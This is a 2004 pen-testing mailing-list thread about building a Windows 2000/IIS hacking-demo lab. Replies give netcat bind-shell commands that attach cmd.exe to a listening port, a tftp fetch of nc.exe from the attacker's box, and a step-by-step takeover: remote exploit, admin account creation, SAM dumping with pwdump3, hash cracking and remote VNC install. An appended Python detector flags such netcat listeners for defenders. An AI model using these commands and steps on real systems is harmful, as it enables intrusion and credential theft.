QODS ec

Friday, June 11, 2004

SEC: Hacking Demo and Test Lab

raza sharif Fri, Jun 11, 2004 at 7:41AM
To: pen-test@securityfocus.com


Hi Folks,

I'm doing some advanced hacking demos for management and also corporates etc.

I have installed Windows 2000 Server and IIS 5.0 on VMware GSX Server.

I'm using WebDAV and other exploits that all basically should spawn a shell using netcat.

I'm using XP as my attacking machine.

Problem at the moment is Netcat will not spawn a shell regardless of what I try.

Any ideas? I checked the install; it is Windows 2000 500.1295, no reference to service packs etc. It's a default install.

Also, what are good demos etc. to run to show real hacking on Windows 2000, IIS etc. that I can get to work?

thanks

Raza

Raza@raza.demon.co.uk

Martin Wasson Fri, Jun 11, 2004 at 11:33AM
To: raza sharif
Cc: pen-test@securityfocus.com


Raza,
A few things. I wouldn't really call this advanced. Why are you hacking
from XP instead of Linux? Get yourself a Linux box. These exploits of
which you write do not spawn shells using netcat. Netcat can bind shells
after you install it. You have to pop the Win2k box first, with something
like oc192-dcom.c. This exploit will get you a shell, then have it GET
(tftp) the files (like netcat) from your Linux box. Once the win2k box has
received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started netcat
on your Linux box (nc 1234).

Does that help?

Regards,

Marty Wasson, CISSP, CEH, IAM
Sr. Information Security Analyst
Global Information Security
MasterCard International
(636) 722-2372
martin_wasson@mastercard.com

"Men occasionally stumble over the truth, but most of them pick themselves
up and hurry off as if nothing ever happened." Winston Churchill

Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:49AM
To: raza sharif , pen-test@securityfocus.com
Try this command on the remote machine:
nc -l -p 23 -t -e cmd.exe

This allows nc to listen on port 23 for connections. When a connection is
made it will spawn a cmd [DOS] shell, or whatever program you want to exec.
Hope that helps. If that fails, you can really impress the execs by using
knoppix-std (http://knoppix-std.org) to do all your hacking demos. Or if
you'd like, you could give me access to your lab, and I'd do it for you. I'm
kidding, of course I couldn't do that, plus it would violate numerous laws
and ethics :) Are you familiar with Linux?

Christopher Grissett
Security Analyst
Network Enterprise Security Team

Victor Chapela Fri, Jun 11, 2004 at 1:59PM
To: raza sharif , pen-test@securityfocus.com
I am not sure about VMware; I also had some problems running demos
consistently and decided to use a separate machine.

I usually do my demos with a similar configuration XP -> 2000.

A good 5 min sketch is:
- get a remote shell using Jill, iis5hack or dcomexploit
- You end up as NT Authority/SYSTEM in all cases, therefore you can add
yourself as an administrator
- connect to the admin$ share using your new credentials
- dump the SAM file with pwdump3
- crack some hashes using john
- copy winvnc to system32
- add your vnc password to the remote registry
- install and start winvnc remotely
- start a VNC session

Even though you will rarely need to install vnc while pen testing, I have
found that for demos it is a very good way to get the point through.

Good luck

Victor

Grissett, Chris CONT Ciber Fri, Jun 11, 2004 at 10:59AM
To: raza sharif , pen-test@securityfocus.com
I guess I should have included a working example:

Assuming that you already have nc on the 2000 box, run this command:

nc -l -p 23 -t -e cmd.exe

Then on your XP box run this command:

nc xxx.xxx.xxx.xxx 23

Replace the x's with the IP of the 2000 Server box. The 23 is for the port
you assigned it earlier.

Oh, when you installed 2000 Server, what type of connection did you choose?
You should choose to have 2000 Server have direct access to the host's
Ethernet card and its connections. Do you have any personal firewalls
running at all? Are these two machines connected via a hub or switch?
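As an added example (written here, not by any of the posters and not part of the original thread), this is the check a defender would run over process-creation command lines to spot exactly the listener commands traded above (`nc -l -p 23 -t -e cmd.exe`, `nc -L -p 1234 -e cmd.exe`): a parser for netcat command lines that flags a listener with a program attached via -e. The sample command lines are constructed; the parser also accepts getopt-style clustered flags such as -lvp 23 and -p23, which the thread's own commands do not use.

```python
import shlex
from collections import namedtuple

NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}   # classic Hobbit netcat binaries
# port: None when no usable -p; program: the -e target; persistent: -L (Windows build) re-listens after disconnect
NetcatListener = namedtuple("NetcatListener", "port program persistent")

def parse_netcat_listener(cmdline):
    """Return a NetcatListener if cmdline runs netcat as a listener with -e, else None.
    Accepts separate flags (-l -p 23 -e cmd.exe) and getopt-style clusters (-lvp 23, -p23)."""
    try:
        argv = shlex.split(cmdline, posix=False)   # non-posix: Windows backslashes survive
    except ValueError:                              # unbalanced quotes: not parseable
        return None
    image = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower() if argv else ""
    if image not in NETCAT_NAMES:                   # not a netcat process at all
        return None
    listening = persistent = False
    port, program = None, None
    i = 1
    while i < len(argv):
        flags = argv[i][1:] if argv[i].startswith("-") else ""
        for j, ch in enumerate(flags):
            if ch in "pe":                          # flags that take a value
                value = flags[j + 1:]               # -p23 style ...
                if not value:                       # ... or the next argv token
                    i += 1
                    value = argv[i] if i < len(argv) else ""
                if ch == "p":
                    port = int(value) if value.isdigit() else None
                else:
                    program = value.strip('"')
                break                               # the value ends this flag cluster
            listening |= ch in "lL"
            persistent |= ch == "L"
        i += 1
    return NetcatListener(port, program, persistent) if listening and program else None

SAMPLE_CMDLINES = [   # constructed process-creation command lines, not real telemetry
    r"C:\WINNT\system32\nc.exe -l -p 23 -t -e cmd.exe",   # the command from this thread
    r"nc -L -p 1234 -e cmd.exe",                           # persistent Windows listener
    r"nc -lvp 4444 -e /bin/sh",                            # clustered flags, Unix shell
    r"nc 192.0.2.10 23",                                   # outbound client, not a listener
    r"nc -l -p 8080",                                      # listener with no program attached
]

def scan(cmdlines):
    """Return (cmdline, NetcatListener) pairs for every bind-shell-style netcat listener."""
    return [(c, hit) for c in cmdlines if (hit := parse_netcat_listener(c)) is not None]
```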
